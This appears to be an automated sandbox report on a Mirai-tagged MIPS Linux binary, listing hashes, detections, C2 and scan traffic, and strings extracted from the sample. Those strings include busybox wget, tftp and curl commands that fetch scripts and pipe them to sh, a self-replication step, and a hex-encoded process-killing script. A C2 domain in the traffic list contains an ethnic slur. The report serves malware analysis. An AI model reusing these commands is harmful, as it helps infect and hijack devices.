Linux Analysis Report
x1b5bmJgLm.elf

Overview

General Information

Sample name: x1b5bmJgLm.elf
renamed because original name is a hash value
Original sample name: 8ac6a5c44bf5210977516855e05e313c.elf
Analysis ID: 1432500
MD5: 8ac6a5c44bf5210977516855e05e313c
SHA1: 6d512103203957fa00e0476fadfa7faa2e3ddf81
SHA256: 9b79ce0f2c7f49a5ea79192d116ece5e85fc3441b353e89c1cec8c6c71df1b80
Tags: 32elfmipsmirai
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: x1b5bmJgLm.elf Virustotal: Detection: 35% Perma Link
Source: x1b5bmJgLm.elf ReversingLabs: Detection: 55%
Source: x1b5bmJgLm.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

barindex
Source: global traffic TCP traffic: 86.104.194.181 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 192.168.2.15:41724 -> 86.104.194.181:38241
Source: /tmp/x1b5bmJgLm.elf (PID: 5823) Socket: 127.0.0.1::39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 74.233.129.2
Source: unknown TCP traffic detected without corresponding DNS query: 92.113.23.98
Source: unknown TCP traffic detected without corresponding DNS query: 2.129.153.27
Source: unknown TCP traffic detected without corresponding DNS query: 124.244.191.222
Source: unknown TCP traffic detected without corresponding DNS query: 99.25.18.162
Source: unknown TCP traffic detected without corresponding DNS query: 72.231.121.3
Source: unknown TCP traffic detected without corresponding DNS query: 141.164.18.7
Source: unknown TCP traffic detected without corresponding DNS query: 219.223.11.45
Source: unknown TCP traffic detected without corresponding DNS query: 117.115.15.150
Source: unknown TCP traffic detected without corresponding DNS query: 144.28.22.236
Source: unknown TCP traffic detected without corresponding DNS query: 109.253.169.26
Source: unknown TCP traffic detected without corresponding DNS query: 217.147.254.224
Source: unknown TCP traffic detected without corresponding DNS query: 83.23.13.129
Source: unknown TCP traffic detected without corresponding DNS query: 202.162.69.117
Source: unknown TCP traffic detected without corresponding DNS query: 154.246.221.7
Source: unknown TCP traffic detected without corresponding DNS query: 34.128.191.87
Source: unknown TCP traffic detected without corresponding DNS query: 79.50.179.36
Source: unknown TCP traffic detected without corresponding DNS query: 182.1.123.14
Source: unknown TCP traffic detected without corresponding DNS query: 162.146.183.236
Source: unknown TCP traffic detected without corresponding DNS query: 83.141.82.188
Source: unknown TCP traffic detected without corresponding DNS query: 160.103.0.246
Source: unknown TCP traffic detected without corresponding DNS query: 187.230.24.179
Source: unknown TCP traffic detected without corresponding DNS query: 111.168.18.225
Source: unknown TCP traffic detected without corresponding DNS query: 62.86.186.62
Source: unknown TCP traffic detected without corresponding DNS query: 39.164.237.251
Source: unknown TCP traffic detected without corresponding DNS query: 98.58.64.150
Source: unknown TCP traffic detected without corresponding DNS query: 160.254.154.118
Source: unknown TCP traffic detected without corresponding DNS query: 136.205.89.170
Source: unknown TCP traffic detected without corresponding DNS query: 62.49.159.236
Source: unknown TCP traffic detected without corresponding DNS query: 180.95.228.32
Source: unknown TCP traffic detected without corresponding DNS query: 9.67.208.2
Source: unknown TCP traffic detected without corresponding DNS query: 208.73.247.118
Source: unknown TCP traffic detected without corresponding DNS query: 31.98.125.186
Source: unknown TCP traffic detected without corresponding DNS query: 153.186.33.248
Source: unknown TCP traffic detected without corresponding DNS query: 208.230.106.32
Source: unknown TCP traffic detected without corresponding DNS query: 123.74.225.115
Source: unknown TCP traffic detected without corresponding DNS query: 78.82.53.77
Source: unknown TCP traffic detected without corresponding DNS query: 87.198.164.60
Source: unknown TCP traffic detected without corresponding DNS query: 131.1.140.196
Source: unknown TCP traffic detected without corresponding DNS query: 133.249.125.93
Source: unknown TCP traffic detected without corresponding DNS query: 186.248.102.140
Source: unknown TCP traffic detected without corresponding DNS query: 135.119.214.217
Source: unknown TCP traffic detected without corresponding DNS query: 21.45.122.56
Source: unknown TCP traffic detected without corresponding DNS query: 153.4.50.70
Source: unknown TCP traffic detected without corresponding DNS query: 65.183.177.1
Source: unknown TCP traffic detected without corresponding DNS query: 140.253.35.149
Source: unknown TCP traffic detected without corresponding DNS query: 203.232.236.151
Source: unknown TCP traffic detected without corresponding DNS query: 39.113.194.173
Source: unknown TCP traffic detected without corresponding DNS query: 130.234.128.217
Source: unknown TCP traffic detected without corresponding DNS query: 93.123.196.32
Source: global traffic DNS traffic detected: DNS query: infectedchink.pirate
Source: x1b5bmJgLm.elf String found in binary or memory: http:///curl.sh
Source: x1b5bmJgLm.elf String found in binary or memory: http:///wget.sh
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.linELF@0/84@1/0
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5860/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5860/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5850/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5850/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5861/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5861/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5851/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5851/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5862/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5862/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5849/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5849/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5852/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5852/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5853/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5853/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5897/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5897/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5854/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5854/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5844/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5844/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5855/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5855/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5845/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5845/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5856/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5856/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5846/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5846/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5857/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5857/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5912/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5912/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5847/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5847/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5858/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5858/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5848/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5848/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5848/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5848/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5859/maps Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5829) File opened: /proc/5859/cmdline Jump to behavior
Source: /tmp/x1b5bmJgLm.elf (PID: 5823) Queries kernel information via 'uname': Jump to behavior
Source: x1b5bmJgLm.elf, 5823.1.00007ffed7fb9000.00007ffed7fda000.rw-.sdmp, x1b5bmJgLm.elf, 5827.1.00007ffed7fb9000.00007ffed7fda000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/x1b5bmJgLm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/x1b5bmJgLm.elf
Source: x1b5bmJgLm.elf, 5823.1.00005576055a2000.0000557605629000.rw-.sdmp, x1b5bmJgLm.elf, 5827.1.00005576055a2000.0000557605629000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: x1b5bmJgLm.elf, 5823.1.00005576055a2000.0000557605629000.rw-.sdmp, x1b5bmJgLm.elf, 5827.1.00005576055a2000.0000557605629000.rw-.sdmp Binary or memory string: vU!/etc/qemu-binfmt/mipsel
Source: x1b5bmJgLm.elf, 5823.1.00007ffed7fb9000.00007ffed7fda000.rw-.sdmp, x1b5bmJgLm.elf, 5827.1.00007ffed7fb9000.00007ffed7fda000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs